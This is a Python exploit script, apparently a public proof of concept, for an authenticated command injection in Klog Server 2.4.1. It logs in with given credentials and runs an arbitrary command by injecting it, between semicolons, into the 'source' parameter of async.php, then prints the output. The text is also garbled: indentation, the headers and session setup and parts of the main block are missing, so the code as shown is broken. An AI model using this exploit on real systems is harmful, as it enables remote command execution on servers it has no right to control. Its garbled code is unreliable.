from argparse import ArgumentParser, Namespace
dsc = "Klog Server 2.4.1 - Command Injection (Authenticated)"
parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
parser.add_argument("--target", help="IPv4 address of Cockpit server", type=str, required=True)
parser.add_argument("--username", help="Username", type=str, required=True)
parser.add_argument("--password", help="Password", type=str, required=True)
parser.add_argument("--command", help="Command", type=str, required=True)
args: Namespace = parser.parse_args()
exploit(target, username, password, command)
def exploit(target, username, password, command):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
data = {"user" : username, "pswd" : password}
login = s.post("https://" + target + "/actions/authenticate.php" , data=data, headers=headers, allow_redirects=False, verify=False)
print("[*] Status Code for login request: " + str(login.status_code))
if login.status_code == 302:
check = s.get("https://" + target + "/index.php", allow_redirects=False, verify=False)
if check.status_code == 200:
print("[+] Authentication was successful!")
print("[-] Authentication was unsuccessful!")
print("Something went wrong!")
print("[*] Exploiting...\n")
executeCommand = s.get("https://" + target + "/actions/async.php?action=stream&source=;"+ command +";", allow_redirects=False, verify=False)
print(executeCommand.text)
if __name__ == '__main__':